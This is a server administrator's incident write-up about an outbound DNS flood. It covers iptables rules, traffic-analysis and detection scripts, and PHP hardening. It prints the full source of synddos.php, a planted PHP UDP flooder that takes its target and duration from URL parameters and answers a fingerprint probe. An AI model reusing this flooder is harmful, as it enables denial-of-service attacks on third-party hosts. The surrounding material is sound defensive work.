resolved – port 53 dns flooding attack
I found this port 53 DNS flooding attack when the server became very unstable: the NIC was blipping and networking just went down without the OS rebooting.
Using ntop as a detector, I found that DNS traffic was at a very high level (about 3Gb of traffic). Then I decided to forbid DNS traffic and only allow some usual ports.
- stop iptables and disable its autoboot (SysV init only runs links whose name starts with a capital S, so lowercasing the S disables autostart without deleting the link)
/etc/init.d/iptables stop
mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables
- here are the rules
[root@doxer ~]# cat iptables-stop-flood.sh
#!/bin/bash
# Flush everything and default to DROP in all three chains; every permitted
# flow below has to be allowed explicitly.
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

# Allow ftp, http, mysql
# todo - without -m multiport, --dport/--sport accept a single port or a
#        first:last range; a comma-separated list needs -m multiport
# todo - multiport --ports matches when either the source or the destination
#        port is in the list
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

# Allow outgoing http, e.g. telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

# Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

# Allow sftp (port 115 is the old Simple File Transfer Protocol; SSH-based
# sftp rides on port 22, allowed below)
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

# Allow ssh in and out. Note that the INPUT --sport rules here and for rsync
# below accept any packet whose *source* port is 22 or 873, which an attacker
# can choose freely; the ESTABLISHED,RELATED rule above already covers the
# return half of outgoing connections, so these are redundant and weaken the
# policy.
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

# Allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

# Allow ftp passive mode (set pasv_min_port/pasv_max_port in vsftpd.conf to
# the same range first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

# Allow ping. ICMP echo request is type 8, echo reply is type 0.
# Allow other hosts to ping this one (rate-limited to 1/s)
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
# Allow this host to ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

# Allow dns query. Left commented out on purpose: with OUTPUT DROP and no
# port 53 rule the flood cannot leave the box, but the box cannot resolve
# names either.
#iptables -A OUTPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -m state --state ESTABLISHED -j ACCEPT

# Allow local loopback services (the OUTPUT policy is DROP too, so the
# outbound half of loopback traffic needs its own rule)
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart
- run the rules
chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh
- enable autoboot of iptables again by restoring the link name
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables
After all these steps, DNS traffic dropped back to normal.
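Blocking port 53 outright stops the symptom, but it also cuts off the server's own name resolution, so it helps to know first where the traffic is coming from. The script below is an added example and not part of the original post: it ranks the sources of outbound UDP/53 traffic in the text output of a hypothetical `tcpdump -n -i eth0 udp port 53` run on the server. The capture it parses is a constructed sample, not data from the incident.

```shell
#!/bin/sh
# Added example, not part of the original post: find out which host on the
# wire is generating the outbound DNS traffic. Input is the text output of a
# hypothetical  tcpdump -n -i eth0 udp port 53  run on the server; the
# capture below is a constructed sample, not real data.

# Constructed sample: 203.0.113.10 sprays 64 KB UDP "queries" at two resolvers,
# 203.0.113.20 does one ordinary lookup and gets an answer back.
SAMPLE_CAPTURE='12:00:01.000001 IP 203.0.113.10.41234 > 198.51.100.5.53: UDP, length 65507
12:00:01.000120 IP 203.0.113.10.41234 > 198.51.100.5.53: UDP, length 65507
12:00:01.000240 IP 203.0.113.10.41235 > 198.51.100.6.53: UDP, length 65507
12:00:01.000360 IP 203.0.113.10.41235 > 198.51.100.6.53: UDP, length 65507
12:00:01.000480 IP 203.0.113.10.41234 > 198.51.100.5.53: UDP, length 65507
12:00:01.100000 IP 203.0.113.20.53512 > 198.51.100.5.53: 1234+ A? example.com. (29)
12:00:01.105000 IP 198.51.100.5.53 > 203.0.113.20.53512: 1234 1/0/0 A 93.184.216.34 (45)'

# Read tcpdump text on stdin; print "<source ip> <packets> <bytes>" for every
# source that sent packets *to* port 53, largest sender first. Replies from a
# resolver (source port 53) are not counted, so a busy but legitimate resolver
# does not show up as a flooder.
udp53_by_source() {
    awk '
    $2 == "IP" && $5 ~ /\.53:$/ {
        src = $3
        sub(/\.[0-9]+$/, "", src)                     # drop the source port
        bytes = 0
        if (match($0, /length [0-9]+$/))              # undecodable payload: "UDP, length N"
            bytes = substr($0, RSTART + 7)
        else if (match($0, /\([0-9]+\)$/))            # decoded DNS message: "(N)"
            bytes = substr($0, RSTART + 1, RLENGTH - 2)
        pk[src]++
        by[src] += bytes
    }
    END { for (s in pk) printf "%s %d %d\n", s, pk[s], by[s] }
    ' | sort -k3,3nr
}

# Print the sources whose byte total exceeds the threshold given as $1.
flag_udp53_sources() {
    udp53_by_source | awk -v thr="$1" '$3 > thr { print $1 }'
}

printf '%s\n' "$SAMPLE_CAPTURE" | udp53_by_source
# -> 203.0.113.10 5 327535
#    203.0.113.20 1 29
```

Once the top source turns out to be the server itself, `netstat -anup` or `ss -unp` on the box maps the UDP sockets to process IDs, which narrows the search to the program that owns them rather than to port 53 as a whole.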
NB:
After several days' investigation, I finally found out that this attack originated from some worms (PHP worms?) embedded in dedecms's directory. Here is one file called synddos.php:
<?php
// synddos.php as found in the dedecms directory, reformatted with comments.
// Everything comes straight from the request: the target host and UDP port,
// and how many seconds to keep sending.
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
$out = '';
ignore_user_abort(True);

// Without target parameters the script only answers a fingerprint probe:
// a request with ?rat=<marker> gets back host name, IP, uname and server
// software wrapped in the marker, so the controller can confirm the implant.
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
    if (StrLen($_GET['rat'])<>0){
        echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
        exit;
    }
    echo "Warning to: opening";
    exit;
}

// Build a 64 KB payload of 'A' bytes ...
for($i=0;$i<$Sendlen;$i++){
    $out .= "A";
}

// ... and fire it at host:port over UDP as fast as the loop runs until the
// deadline. UDP fsockopen does no handshake, so every iteration "succeeds"
// and sends from a fresh ephemeral source port.
$max_time = time()+$exec_time;
while(1){
    $packets++;
    if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if($fp){
        fwrite($fp, $out);
        fclose($fp);
    }
}

// Report back to the controller how much was sent.
echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>
This is crazy! That explains why there was so much outbound DNS traffic!
To cure this weakness (besides deleting synddos.php and any other PHP dropped into those directories):
1. disable fsockopen in php.ini. disable_functions takes a comma-separated list, and fsockopen alone still leaves pfsockopen, stream_socket_client and the socket_* functions available to a rewritten flooder:
disable_functions = fsockopen
2. in .htaccess, stop PHP from executing in the directories that should only hold uploaded or generated files (needs mod_rewrite and AllowOverride for that directory; the first RewriteCond is always true and does not restrict the rules):
RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*)\.php$ - [F]
RewriteRule data/(.*)\.php$ - [F]
RewriteRule templets/(.*)\.php$ - [F]
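Two checks that go with those fixes, written here as an added example and not taken from the original post: a sweep of the web root for PHP files that sit in the upload/data/template directories or contain UDP socket code, and a check that the php.ini disable_functions line really covers the whole socket family rather than just fsockopen. The directory names are the ones from the rewrite rules above; the fixture files and php.ini contents are constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original post. The directory names (uploads,
# data, templets) are the ones from the rewrite rules; the fixture files and
# php.ini contents below are constructed.

# Socket functions a UDP flooder can be rewritten to use; disabling fsockopen
# alone leaves all the others open.
SOCKET_FUNCS="fsockopen pfsockopen stream_socket_client socket_create socket_sendto"

# Walk a web root and report PHP files that either sit in a directory where PHP
# should never execute, or contain socket code aimed at a udp:// target.
find_flooder_candidates() {
    root=$1
    find "$root" -type f -name '*.php' | while IFS= read -r f; do
        rel=${f#"$root"/}
        case "$rel" in
            uploads/*|data/*|templets/*)
                echo "$rel: php in non-executable dir"
                continue ;;
        esac
        if grep -Eq 'fsockopen|pfsockopen|stream_socket_client|socket_create|socket_sendto' "$f" \
           && grep -Eq 'udp://|SOL_UDP' "$f"; then
            echo "$rel: udp socket code"
        fi
    done
}

# Print the socket functions that the given php.ini does NOT list in
# disable_functions (empty output means all of SOCKET_FUNCS are disabled).
missing_disabled_functions() {
    disabled=$(sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$1" | tr ',' ' ')
    for fn in $SOCKET_FUNCS; do
        found=0
        for d in $disabled; do
            [ "$d" = "$fn" ] && found=1
        done
        [ "$found" -eq 0 ] && echo "$fn"
    done
    return 0
}

# Constructed fixture: a cut-down look-alike of synddos.php under uploads/, a
# harmless index.php, a second flooder using stream_socket_client in a
# directory that legitimately runs PHP, and a weak and a strong php.ini.
# Prints the fixture directory.
make_fixture() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/www/uploads" "$tmp/www/plus"
    printf '%s\n' '<?php $fp = fsockopen("udp://$host", $port); fwrite($fp, $out);' > "$tmp/www/uploads/synddos.php"
    printf '%s\n' '<?php echo "index";' > "$tmp/www/plus/index.php"
    printf '%s\n' '<?php $s = stream_socket_client("udp://$host:$port"); fwrite($s, $out);' > "$tmp/www/plus/helper.php"
    printf '%s\n' 'disable_functions = fsockopen' > "$tmp/weak.ini"
    printf '%s\n' "disable_functions = $(echo "$SOCKET_FUNCS" | tr ' ' ',')" > "$tmp/strong.ini"
    echo "$tmp"
}

FIXTURE=$(make_fixture)
find_flooder_candidates "$FIXTURE/www" | sort
# -> plus/helper.php: udp socket code
#    uploads/synddos.php: php in non-executable dir
missing_disabled_functions "$FIXTURE/weak.ini"
# -> pfsockopen, stream_socket_client, socket_create, socket_sendto (one per line)
```

The string match is a triage aid, not a verdict: a file that merely mentions udp:// in a comment shows up too, and a flooder that builds its function name at run time does not, so treat hits as a list to read, and treat any PHP file at all under uploads/, data/ or templets/ as a finding. If PHP runs under mod_php, `php_flag engine off` in the .htaccess of those directories is another way to stop execution there; with PHP-FPM the rewrite rules above (or the equivalent deny in the server config) are the way.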
